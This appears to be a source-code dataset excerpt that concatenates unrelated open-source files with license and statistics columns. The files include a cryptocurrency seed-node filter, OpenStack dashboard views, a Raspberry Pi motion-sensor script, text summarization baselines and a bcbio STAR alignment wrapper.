'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
}
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
result = []
asn_count = {}
for ip in ips:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
# Skip entries with valid IPv4 address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(ip['agent'])]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['ipnum']))
for ip in ips:
print ip['ip']
if __name__ == '__main__':
main()
|
mit
| -8,680,919,261,118,517,000
| 29.495652
| 186
| 0.572569
| false
| 3.070928
| false
| false
| false
|
camptocamp/QGIS
|
python/plugins/processing/outputs/OutputExtent.py
|
1
|
1632
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
OutputNumber.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.outputs.Output import Output
class OutputExtent(Output):
def __init__(self, name="", description=""):
self.name = name
self.description = description
self.value = None
self.hidden = True
def setValue(self, value):
try:
if value != None and isinstance(value, basestring):
value = value.strip()
else:
self.value = ",".join([str(v) for v in value])
return True
except:
return False
|
gpl-2.0
| 8,318,590,386,951,244,000
| 36.090909
| 75
| 0.424632
| false
| 5.164557
| false
| false
| false
|
ujikit/Raspberry
|
Pir_Sensor.py
|
1
|
1093
|
#!/usr/bin/python
import RPi.GPIO as GPIO
import time
import os
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(27,GPIO.OUT)
GPIO_PIR = 7
print "PIR Module Test (CTRL-C to exit)"
# Set pin as input
GPIO.setup(GPIO_PIR,GPIO.IN) # Echo
Current_State = 0
Previous_State = 0
try:
print "Waiting for PIR to settle ..."
# Loop until PIR output is 0
while GPIO.input(GPIO_PIR)==1:
Current_State = 0
print " Ready"
# Loop until users quits with CTRL-C
while True :
# Read PIR state
Current_State = GPIO.input(GPIO_PIR)
if Current_State==1 and Previous_State==0:
GPIO.output(27,GPIO.HIGH)
time.sleep(0.5)
GPIO.output(27,GPIO.LOW)
Previous_State=1
os.system('mpg321 /home/alarm.mp3 &')
time.sleep(min(1,clip.seconds()))
clip.stop()
elif Current_State==0 and Previous_State==1:
# PIR has returned to ready state
print " Ready"
Previous_State=0
# Wait for 10 milliseconds
time.sleep(0.01)
except KeyboardInterrupt:
print " Quit"
# Reset GPIO settings
GPIO.cleanup()
|
gpl-3.0
| -486,704,074,232,634,300
| 21.770833
| 48
| 0.650503
| false
| 2.954054
| false
| false
| false
|
canarie/openstack-dashboard
|
django-openstack/src/django_openstack/nova/views/instances.py
|
1
|
9293
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Nova instances.
"""
from django import http
from django import template
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect, render_to_response
from django.utils.translation import ugettext as _
from django_openstack import log as logging
from django_openstack.nova import exceptions
from django_openstack.nova import forms as nova_forms
from django_openstack.nova import shortcuts
from django_openstack.nova.exceptions import handle_nova_error
import boto.ec2.ec2object
LOG = logging.getLogger('django_openstack.nova')
@login_required
@handle_nova_error
def index(request, project_id):
project = shortcuts.get_project_or_404(request, project_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
return render_to_response('django_openstack/nova/instances/index.html', {
'region': project.region,
'project': project,
'instances': instances,
'detail': False,
}, context_instance=template.RequestContext(request))
@login_required
@handle_nova_error
def detail(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
if not instance:
raise http.Http404()
return render_to_response('django_openstack/nova/instances/index.html', {
'region': project.region,
'project': project,
'selected_instance': instance,
'instances': instances,
'update_form': nova_forms.UpdateInstanceForm(instance),
'enable_vnc': settings.ENABLE_VNC,
'detail': True,
}, context_instance=template.RequestContext(request))
@login_required
@handle_nova_error
def performance(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
if not instance:
raise http.Http404()
return render_to_response(
'django_openstack/nova/instances/performance.html',
{'region': project.region,
'project': project,
'instance': instance,
'update_form': nova_forms.UpdateInstanceForm(instance)},
context_instance=template.RequestContext(request))
# TODO(devcamcar): Wrap this in an @ajax decorator.
def refresh(request, project_id):
# TODO(devcamcar): This logic belongs in decorator.
if not request.user.is_authenticated():
return http.HttpResponseForbidden()
project = shortcuts.get_project_or_404(request, project_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
return render_to_response(
'django_openstack/nova/instances/_instances_list.html',
{'project': project,
'instances': instances},
context_instance=template.RequestContext(request))
@handle_nova_error
def refresh_detail(request, project_id, instance_id):
# TODO(devcamcar): This logic belongs in decorator.
if not request.user.is_authenticated():
return http.HttpResponseForbidden()
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
return render_to_response(
'django_openstack/nova/instances/_instances_list.html',
{'project': project,
'selected_instance': instance,
'instances': instances},
context_instance=template.RequestContext(request))
@login_required
@handle_nova_error
def terminate(request, project_id):
project = shortcuts.get_project_or_404(request, project_id)
if request.method == 'POST':
instance_id = request.POST['instance_id']
try:
project.terminate_instance(instance_id)
except exceptions.NovaApiError, e:
messages.error(request,
_('Unable to terminate %(inst)s: %(msg)s') %
{'inst': instance_id, 'msg': e.message})
LOG.error('Unable to terminate instance "%s" on project "%s".'
' Exception:"%s"' % (instance_id, project_id, e.message))
except exceptions.NovaUnauthorizedError, e:
messages.error(request, 'Permission Denied')
LOG.error('User "%s" denied permission to terminate instance'
' "%s" on project "%s"' %
(str(request.user), instance_id, project_id))
else:
messages.success(request,
_('Instance %(inst)s has been terminated.') %
{'inst': instance_id})
LOG.info('Instance "%s" terminated on project "%s"' %
(instance_id, project_id))
return redirect('nova_instances', project_id)
@login_required
@handle_nova_error
def console(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
conn = project.get_openstack_connection()
console = conn.get_console_output(instance_id)
response = http.HttpResponse(mimetype='text/plain')
response.write(console.output)
response.flush()
return response
@login_required
@handle_nova_error
def vnc(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
conn = project.get_openstack_connection()
params = {'InstanceId': instance_id}
vnc = conn.get_object('GetVncConsole',
params,
boto.ec2.ec2object.EC2Object)
return http.HttpResponseRedirect(vnc.url)
@login_required
@handle_nova_error
def graph(request, project_id, instance_id, graph_name):
project = shortcuts.get_project_or_404(request, project_id)
graph = project.get_instance_graph(instance_id, graph_name)
if graph is None:
raise http.Http404()
response = http.HttpResponse(mimetype='image/png')
response.write(graph)
return response
@login_required
@handle_nova_error
def update(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
if not instance:
raise http.Http404()
if request.method == 'POST':
form = nova_forms.UpdateInstanceForm(instance, request.POST)
if form.is_valid():
try:
project.update_instance(instance_id, form.cleaned_data)
except exceptions.NovaApiError, e:
messages.error(request,
_('Unable to update instance %(inst)s: %(msg)s') %
{'inst': instance_id, 'msg': e.message})
LOG.error('Unable to update instance "%s" on project "%s".'
' Exception message: "%s"' %
(instance_id, project_id, e.message))
except exceptions.NovaUnauthorizedError, e:
messages.error(request, 'Permission Denied')
LOG.error('User "%s" denied permission to update instance'
' "%s" on project "%s"' %
(str(request.user), instance_id, project_id))
else:
messages.success(request,
_('Instance %(inst)s has been updated.') %
{'inst': instance_id})
LOG.info('Instance "%s" updated on project "%s"' %
(instance_id, project_id))
return redirect('nova_instances', project_id)
else:
return render_to_response(
'django_openstack/nova/instances/edit.html',
{'region': project.region,
'project': project,
'instance': instance,
'update_form': form},
context_instance=template.RequestContext(request))
else:
return render_to_response(
'django_openstack/nova/instances/edit.html',
{'region': project.region,
'project': project,
'instance': instance,
'update_form': nova_forms.UpdateInstanceForm(instance)},
context_instance=template.RequestContext(request))
|
apache-2.0
| 2,217,813,549,633,417,500
| 35.731225
| 79
| 0.633488
| false
| 4.174753
| false
| false
| false
|
HXLStandard/hxl-proxy
|
hxl_proxy/recipes.py
|
1
|
5398
|
""" Manage a data-transformation recipe
Started April 2019 by David Megginson
License: Public Domain
"""
import flask, hxl_proxy, hxl_proxy.dao, hxl_proxy.filters, logging, werkzeug
class Recipe:
""" Class to hold a HXL Proxy recipe.
The recipe can come either from the request parameters, or from a saved recipe
in the database. For a saved recipe, it's still possible to override
certain properties (especially the URL) with the request parameters, so that
you can use the same recipe with multiple source URLs (disabled for private
datasets with authentication tokens).
"""
RECIPE_OVERRIDES = ['url', 'schema_url', 'stub']
""" Properties that may be overridden in a saved recipe """
def __init__(self, recipe_id=None, auth=False, request_args=None):
""" Recipe constructor
@param recipe_id: the hash identifier of an existing saved recipe
@param auth: if true, the user needs to authenticate to use the recipe
@param request_args: custom args to substitute for the current Flask request
"""
# initialise the properties
self.recipe_id = str(recipe_id) if recipe_id is not None else None
self.args = None
self.name = None
self.description = None
self.cloneable = True
self.passhash = None
self.stub = None
self.overridden = False
self.auth = auth
# default to the request GET parameters
if request_args is None:
request_args = flask.request.args
# do we have a saved recipe? if so, then populate from the saved data
if recipe_id is not None:
# read the recipe from the database
saved_recipe = hxl_proxy.dao.recipes.read(self.recipe_id)
if not saved_recipe:
raise werkzeug.exceptions.NotFound("No saved recipe for {}".format(recipe_id))
# populate the class from the saved recipe dict
self.fromDict(saved_recipe)
# check if this page requires authorisation
if auth and not self.check_auth():
raise werkzeug.exceptions.Unauthorized("Wrong or missing password.")
# allow overrides *only* if we're not using a private dataset
# (not sending an HTTP Authorization: header)
if "authorization_token" not in self.args:
for key in self.RECIPE_OVERRIDES:
if key in request_args:
self.overridden = True
self.args[key] = request_args[key]
# we don't have a saved recipe: use the HTTP GET parameters
else:
self.args = request_args
self.stub = request_args.get("stub")
@property
def url(self):
return self.args.get("url")
@property
def schema_url(self):
return self.args.get("schema_url")
def fromDict(self, props):
""" Deserialise this object from a dict """
self.recipe_id = props.get("recipe_id")
self.name = props.get("name")
self.description = props.get("description")
self.cloneable = props.get("cloneable")
self.passhash = props.get("passhash")
self.stub = props.get("stub")
self.date_created = props.get('date_created')
self.date_modified = props.get('date_modified')
self.args = dict(props.get("args"))
def toDict(self):
""" Serialise this object to a dict """
return {
"recipe_id": self.recipe_id,
"name": self.name,
"description": self.description,
"cloneable": self.cloneable,
"passhash": self.passhash,
"stub": self.stub,
"args": self.args,
}
def logs(self, level="WARNING"):
handler = Recipe.LogHandler(level)
logging.getLogger('hxl').addHandler(handler)
logging.getLogger('hxl_proxy').addHandler(handler)
source = hxl_proxy.filters.setup_filters(self)
try:
for row in source:
pass
except:
pass
return handler.messages
def check_auth(self, password=None):
""" Check whether a users is authorised to access this page.
@param password: a cleartext password
@returns: True if the user is authorised.
"""
# does this recipe require a password?
if self.passhash:
# do we have a clear-text password?
if password:
session_passhash = hxl_proxy.util.make_md5(password)
flask.session['passhash'] = session_passhash
# no password, so look in the session token
else:
session_passhash = flask.session.get('passhash')
# do the password hashes match?
if self.passhash == session_passhash:
return True
else:
flask.session['passhash'] = None
flask.flash("Wrong password")
return False
# no password required, so always OK
else:
return True
class LogHandler(logging.Handler):
def __init__(self, level):
super().__init__(level)
self.messages = []
def handle(self, record):
self.messages.append(record)
|
unlicense
| 7,937,438,209,383,225,000
| 32.116564
| 94
| 0.585031
| false
| 4.439145
| false
| false
| false
|
prataprc/tayra
|
tayra/test/stdttl/ref/html5.ttl.py
|
1
|
2138
|
import imp
from io import StringIO
from pluggdapps.plugin import Plugin, implements
from tayra import BaseTTLPlugin
def __traceback_decorator__( frames ):
from copy import deepcopy
from os.path import basename
def _map2ttl( frame ):
filename = frame.filename
lineno = frame.lineno
lines = open(filename).readlines()[:lineno]
lines.reverse()
rc = {}
for l in lines :
if l.strip().startswith('# lineno') :
_, ttl_lineno = l.split(':', 1)
ttl_lineno = int( ttl_lineno )
ttl_text = open( _ttlfile ).readlines()[ ttl_lineno-1 ]
return ttl_lineno, ttl_text
return None, None
newframes = []
for frame in frames :
newframes.append( frame )
frameadded = getattr( frame, '_ttlframeadded', False )
basen = basename( frame.filename )
if basen.endswith( '.ttl.py' ) and basen == (basename( _ttlfile ) + '.py') and frameadded == False :
newframe = deepcopy( frame )
frame._ttlframeadded = True
try :
newframe.lineno, newframe.linetext = _map2ttl( newframe )
if newframe.lineno :
newframe.filename = _ttlfile
newframes.append( newframe )
except :
raise
continue
return newframes
def body( *args, **kwargs ) :
_m.pushbuf()
# lineno:1
_m.pushbuf()
_m.extend( ['<a "http://pluggdapps.com">'] )
_m.pushbuf()
# lineno:1
_m.extend( [' pluggdapps-link', '\n'] )
_m.handletag( _m.popbuftext(), _m.popbuftext(), **{'nl': '', 'oprune': False, 'indent': False, 'iprune': False} )
# lineno:2
_m.pushbuf()
_m.extend( ['<abbr "World Health Organisation">'] )
_m.pushbuf()
# lineno:2
_m.extend( [' WHO', '\n'] )
_m.handletag( _m.popbuftext(), _m.popbuftext(), **{'nl': '', 'oprune': False, 'indent': False, 'iprune': False} )
return _m.popbuftext()
# ---- Global Functions
# ---- Interface functions
# ---- Footer
|
gpl-3.0
| -2,734,730,127,233,263,000
| 31.393939
| 134
| 0.53508
| false
| 3.718261
| false
| false
| false
|
kandluis/document_summaries
|
summarizer/baselines.py
|
1
|
2617
|
'''
Main entry point for our text summarization using our baseline algorithm.
The baseline algorithm consists of assigning a weight to each sentence.
We define the weight of the
Copyright, 2015.
Authors:
Luis Perez (luis.perez.live@gmail.com)
Kevin Eskici (keskici@college.harvard.edu)
'''
from . import utils
import numpy as np
def geom(p, k):
return (1.0 - p)**k * p
def concatDocs(D):
sents = []
for doc in D:
sents += doc
return sents
def baseline(D, k):
'''
Baseline simply takes the first k sentences in the documents.
'''
D = concatDocs(D)
mapping = {i:i for i in xrange(len(D))}
return range(k), D, mapping
def geomPriorBaseline(D, k, p=0.02):
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
probs = np.array([geom(p, i) for i in xrange(len(sentences))])
probs = probs / sum(probs)
summary = np.random.choice(xrange(len(sentences)), size=k,
replace=False, p=probs)
return summary, D, mapping
def modifiedGeomPriorBaseline(D, k, p=0.02):
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
probs = np.array([geom(p, i) for i in xrange(1, len(sentences))])
probs = probs / sum(probs)
summary = np.random.choice(xrange(1, len(sentences)), size=k,
replace=False, p=probs)
summary = np.append(0, summary)
return summary, D, mapping
def multipleGeomPrior(D, k, p=0.02):
probs = []
for doc in D:
sentences, _ = utils.cleanDocument(doc)
docProbs = np.array([geom(p, i) for i in xrange(len(sentences))])
docProbs = docProbs / sum(docProbs)
probs += list(docProbs)
probs = np.array(probs)/sum(probs)
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
summary = np.random.choice(xrange(len(sentences)), size=k,
replace=False, p=probs)
return summary, D, mapping
def wordFreqBaseline(D, k):
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
freqs = utils.MyCounter()
for sentence in sentences:
for word in sentence:
freqs[word] += 1.0
summary = []
summary_words = set()
while len(summary) < min(k, len(D)):
sent_scores = [sum([freqs[word] for word in sentence
if word not in summary_words]) / len(sentence) for sentence in sentences]
selected = sent_scores.index(max(sent_scores))
summary.append(selected)
summary_words = summary_words.union(sentences[selected])
return summary, D, mapping
|
apache-2.0
| 8,077,415,874,106,459,000
| 28.077778
| 101
| 0.621704
| false
| 3.434383
| false
| false
| false
|
arunkgupta/gramps
|
gramps/gen/filters/rules/person/_iswitness.py
|
1
|
2398
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....ggettext import gettext as _
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from .. import Rule
from ....lib.eventroletype import EventRoleType
from ....lib.eventtype import EventType
#-------------------------------------------------------------------------
# "Witnesses"
#-------------------------------------------------------------------------
class IsWitness(Rule):
"""Witnesses"""
labels = [_('Event type:')]
name = _('Witnesses')
description = _("Matches people who are witnesses in any event")
category = _('Event filters')
def apply(self,db,person):
for event_ref in person.event_ref_list:
if event_ref and event_ref.role == EventRoleType.WITNESS:
# This is the witness.
# If event type was given, then check it.
if self.list[0]:
event = db.get_event_from_handle(event_ref.ref)
specified_type = EventType()
specified_type.set_from_xml_str(self.list[0])
if event.type == specified_type:
return True
else:
# event type was not specified, we're returning a match
return True
return False
|
gpl-2.0
| 2,207,472,141,097,469,400
| 36.46875
| 75
| 0.51543
| false
| 4.805611
| false
| false
| false
|
doriancoins/doriancoin
|
contrib/devtools/check-rpc-mappings.py
|
1
|
5971
|
#!/usr/bin/env python3
# Copyright (c) 2017 The Doriancoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Check RPC argument consistency."""
from collections import defaultdict
import os
import re
import sys
# Source files (relative to root) to scan for dispatch tables
SOURCES = [
"src/rpc/server.cpp",
"src/rpc/blockchain.cpp",
"src/rpc/mining.cpp",
"src/rpc/misc.cpp",
"src/rpc/net.cpp",
"src/rpc/rawtransaction.cpp",
"src/wallet/rpcwallet.cpp",
]
# Source file (relative to root) containing conversion mapping
SOURCE_CLIENT = 'src/rpc/client.cpp'
# Argument names that should be ignored in consistency checks
IGNORE_DUMMY_ARGS = {'dummy', 'arg0', 'arg1', 'arg2', 'arg3', 'arg4', 'arg5', 'arg6', 'arg7', 'arg8', 'arg9'}
class RPCCommand:
def __init__(self, name, args):
self.name = name
self.args = args
class RPCArgument:
def __init__(self, names, idx):
self.names = names
self.idx = idx
self.convert = False
def parse_string(s):
assert s[0] == '"'
assert s[-1] == '"'
return s[1:-1]
def process_commands(fname):
"""Find and parse dispatch table in implementation file `fname`."""
cmds = []
in_rpcs = False
with open(fname, "r") as f:
for line in f:
line = line.rstrip()
if not in_rpcs:
if re.match("static const CRPCCommand .*\[\] =", line):
in_rpcs = True
else:
if line.startswith('};'):
in_rpcs = False
elif '{' in line and '"' in line:
m = re.search('{ *("[^"]*"), *("[^"]*"), *&([^,]*), *{([^}]*)} *},', line)
assert m, 'No match to table expression: %s' % line
name = parse_string(m.group(2))
args_str = m.group(4).strip()
if args_str:
args = [RPCArgument(parse_string(x.strip()).split('|'), idx) for idx, x in enumerate(args_str.split(','))]
else:
args = []
cmds.append(RPCCommand(name, args))
assert not in_rpcs and cmds, "Something went wrong with parsing the C++ file: update the regexps"
return cmds
def process_mapping(fname):
"""Find and parse conversion table in implementation file `fname`."""
cmds = []
in_rpcs = False
with open(fname, "r") as f:
for line in f:
line = line.rstrip()
if not in_rpcs:
if line == 'static const CRPCConvertParam vRPCConvertParams[] =':
in_rpcs = True
else:
if line.startswith('};'):
in_rpcs = False
elif '{' in line and '"' in line:
m = re.search('{ *("[^"]*"), *([0-9]+) *, *("[^"]*") *},', line)
assert m, 'No match to table expression: %s' % line
name = parse_string(m.group(1))
idx = int(m.group(2))
argname = parse_string(m.group(3))
cmds.append((name, idx, argname))
assert not in_rpcs and cmds
return cmds
def main():
root = sys.argv[1]
# Get all commands from dispatch tables
cmds = []
for fname in SOURCES:
cmds += process_commands(os.path.join(root, fname))
cmds_by_name = {}
for cmd in cmds:
cmds_by_name[cmd.name] = cmd
# Get current convert mapping for client
client = SOURCE_CLIENT
mapping = set(process_mapping(os.path.join(root, client)))
print('* Checking consistency between dispatch tables and vRPCConvertParams')
# Check mapping consistency
errors = 0
for (cmdname, argidx, argname) in mapping:
try:
rargnames = cmds_by_name[cmdname].args[argidx].names
except IndexError:
print('ERROR: %s argument %i (named %s in vRPCConvertParams) is not defined in dispatch table' % (cmdname, argidx, argname))
errors += 1
continue
if argname not in rargnames:
print('ERROR: %s argument %i is named %s in vRPCConvertParams but %s in dispatch table' % (cmdname, argidx, argname, rargnames), file=sys.stderr)
errors += 1
# Check for conflicts in vRPCConvertParams conversion
# All aliases for an argument must either be present in the
# conversion table, or not. Anything in between means an oversight
# and some aliases won't work.
for cmd in cmds:
for arg in cmd.args:
convert = [((cmd.name, arg.idx, argname) in mapping) for argname in arg.names]
if any(convert) != all(convert):
print('ERROR: %s argument %s has conflicts in vRPCConvertParams conversion specifier %s' % (cmd.name, arg.names, convert))
errors += 1
arg.convert = all(convert)
# Check for conversion difference by argument name.
# It is preferable for API consistency that arguments with the same name
# have the same conversion, so bin by argument name.
all_methods_by_argname = defaultdict(list)
converts_by_argname = defaultdict(list)
for cmd in cmds:
for arg in cmd.args:
for argname in arg.names:
all_methods_by_argname[argname].append(cmd.name)
converts_by_argname[argname].append(arg.convert)
for argname, convert in converts_by_argname.items():
if all(convert) != any(convert):
if argname in IGNORE_DUMMY_ARGS:
# these are testing or dummy, don't warn for them
continue
print('WARNING: conversion mismatch for argument named %s (%s)' %
(argname, list(zip(all_methods_by_argname[argname], converts_by_argname[argname]))))
sys.exit(errors > 0)
if __name__ == '__main__':
main()
|
mit
| 9,194,470,161,719,797,000
| 36.791139
| 157
| 0.570591
| false
| 3.874757
| false
| false
| false
|
gjo/python-codekitlang
|
codekitlang/command.py
|
1
|
1629
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import logging
import sys
from . import compiler
def _(s):
return s
def main():
parser = argparse.ArgumentParser(
prog='pykitlangc',
description=_('CodeKit Language Compiler.'),
)
parser.add_argument('src', nargs=1, metavar='SRC', help=_('input file'))
parser.add_argument('dest', nargs=1, metavar='DEST', help=_('output file'))
parser.add_argument(
'-f', '--framework-paths', metavar='DIR', action='append',
help=_('path for lookup include file (allow multiple defs)'),
)
parser.add_argument(
'--missing-file-behavior', metavar='BEHAVIOR', default='logonly',
choices=('ignore', 'logonly', 'exception'),
help=_('one of ignore, logonly, exception (default: logonly)'),
)
parser.add_argument(
'--missing-variable-behavior', metavar='BEHAVIOR', default='ignore',
choices=('ignore', 'logonly', 'exception'),
help=_('one of ignore, logonly, exception (default: ignore)'),
)
namespace = parser.parse_args()
options = vars(namespace)
src = options.pop('src')
dest = options.pop('dest')
logger = logging.getLogger('pykitlangc')
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
options['logger'] = logger
compiler_ = compiler.Compiler(**options)
try:
compiler_.generate_to_file(dest[0], src[0])
except compiler.CompileError as e:
print(e.to_message(), file=sys.stderr)
sys.exit(1)
if __name__ == '__main__': # pragma:nocover
main()
|
bsd-3-clause
| -6,925,022,318,885,198,000
| 30.326923
| 79
| 0.622468
| false
| 3.869359
| false
| false
| false
|
brainstorm/bcbio-nextgen
|
bcbio/ngsalign/star.py
|
1
|
7746
|
import os
import sys
import shutil
import subprocess
import contextlib
from collections import namedtuple
from bcbio.pipeline import config_utils
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.utils import (safe_makedir, file_exists, is_gzipped)
from bcbio.provenance import do
from bcbio import utils
from bcbio.log import logger
from bcbio.pipeline import datadict as dd
from bcbio.ngsalign import postalign
from bcbio.bam import fastq
CLEANUP_FILES = ["Aligned.out.sam", "Log.out", "Log.progress.out"]
ALIGN_TAGS = ["NH", "HI", "NM", "MD", "AS"]
def align(fastq_file, pair_file, ref_file, names, align_dir, data):
if not ref_file:
logger.error("STAR index not found. We don't provide the STAR indexes "
"by default because they are very large. You can install "
"the index for your genome with: bcbio_nextgen.py upgrade "
"--aligners star --genomes genome-build-name --data")
sys.exit(1)
max_hits = 10
srna = True if data["analysis"].lower().startswith("smallrna-seq") else False
srna_opts = ""
if srna:
max_hits = 1000
srna_opts = "--alignIntronMax 1"
config = data["config"]
star_dirs = _get_star_dirnames(align_dir, data, names)
if file_exists(star_dirs.final_out):
data = _update_data(star_dirs.final_out, star_dirs.out_dir, names, data)
return data
star_path = config_utils.get_program("STAR", config)
fastq_files = " ".join([fastq_file, pair_file]) if pair_file else fastq_file
num_cores = dd.get_num_cores(data)
gtf_file = dd.get_gtf_file(data)
if ref_file.endswith("chrLength"):
ref_file = os.path.dirname(ref_file)
with file_transaction(data, align_dir) as tx_align_dir:
tx_star_dirnames = _get_star_dirnames(tx_align_dir, data, names)
tx_out_dir, tx_out_file, tx_out_prefix, tx_final_out = tx_star_dirnames
safe_makedir(tx_align_dir)
safe_makedir(tx_out_dir)
cmd = ("{star_path} --genomeDir {ref_file} --readFilesIn {fastq_files} "
"--runThreadN {num_cores} --outFileNamePrefix {tx_out_prefix} "
"--outReadsUnmapped Fastx --outFilterMultimapNmax {max_hits} "
"--outStd SAM {srna_opts} "
"--outSAMunmapped Within --outSAMattributes %s " % " ".join(ALIGN_TAGS))
cmd += _add_sj_index_commands(fastq_file, ref_file, gtf_file) if not srna else ""
cmd += " --readFilesCommand zcat " if is_gzipped(fastq_file) else ""
cmd += _read_group_option(names)
fusion_mode = utils.get_in(data, ("config", "algorithm", "fusion_mode"), False)
if fusion_mode:
cmd += (" --chimSegmentMin 12 --chimJunctionOverhangMin 12 "
"--chimScoreDropMax 30 --chimSegmentReadGapMax 5 "
"--chimScoreSeparation 5 "
"--chimOutType WithinSAM ")
strandedness = utils.get_in(data, ("config", "algorithm", "strandedness"),
"unstranded").lower()
if strandedness == "unstranded" and not srna:
cmd += " --outSAMstrandField intronMotif "
if not srna:
cmd += " --quantMode TranscriptomeSAM "
cmd += " | " + postalign.sam_to_sortbam_cl(data, tx_final_out)
run_message = "Running STAR aligner on %s and %s" % (fastq_file, ref_file)
do.run(cmd.format(**locals()), run_message, None)
print("hello")
data = _update_data(star_dirs.final_out, star_dirs.out_dir, names, data)
return data
StarOutDirs = namedtuple(
'StarOutDirs',
['out_dir', 'out_file', 'out_prefix', 'final_out']
)
def _get_star_dirnames(align_dir, data, names):
ALIGNED_OUT_FILE = "Aligned.out.sam"
out_prefix = os.path.join(align_dir, dd.get_lane(data))
out_file = out_prefix + ALIGNED_OUT_FILE
out_dir = os.path.join(align_dir, "%s_star" % dd.get_lane(data))
final_out = os.path.join(out_dir, "{0}.bam".format(names["sample"]))
return StarOutDirs(out_dir, out_file, out_prefix, final_out)
def _add_sj_index_commands(fq1, ref_file, gtf_file):
"""
newer versions of STAR can generate splice junction databases on thephfly
this is preferable since we can tailor it to the read lengths
"""
if _has_sj_index(ref_file):
return ""
else:
rlength = fastq.estimate_maximum_read_length(fq1)
cmd = " --sjdbGTFfile %s " % gtf_file
cmd += " --sjdbOverhang %s " % str(rlength - 1)
return cmd
def _has_sj_index(ref_file):
"""this file won't exist if we can do on the fly splice junction indexing"""
return file_exists(os.path.join(ref_file, "sjdbInfo.txt"))
def _update_data(align_file, out_dir, names, data):
data = dd.set_work_bam(data, align_file)
data = dd.set_align_bam(data, align_file)
transcriptome_file = _move_transcriptome_file(out_dir, names)
data = dd.set_transcriptome_bam(data, transcriptome_file)
return data
def _move_transcriptome_file(out_dir, names):
out_file = os.path.join(out_dir, "{0}.transcriptome.bam".format(names["sample"]))
star_file = os.path.join(out_dir, os.pardir,
"{0}Aligned.toTranscriptome.out.bam".format(names["lane"]))
# if the out_file or the star_file doesn't exist, we didn't run the
# transcriptome mapping
if not file_exists(out_file):
if not file_exists(star_file):
return None
else:
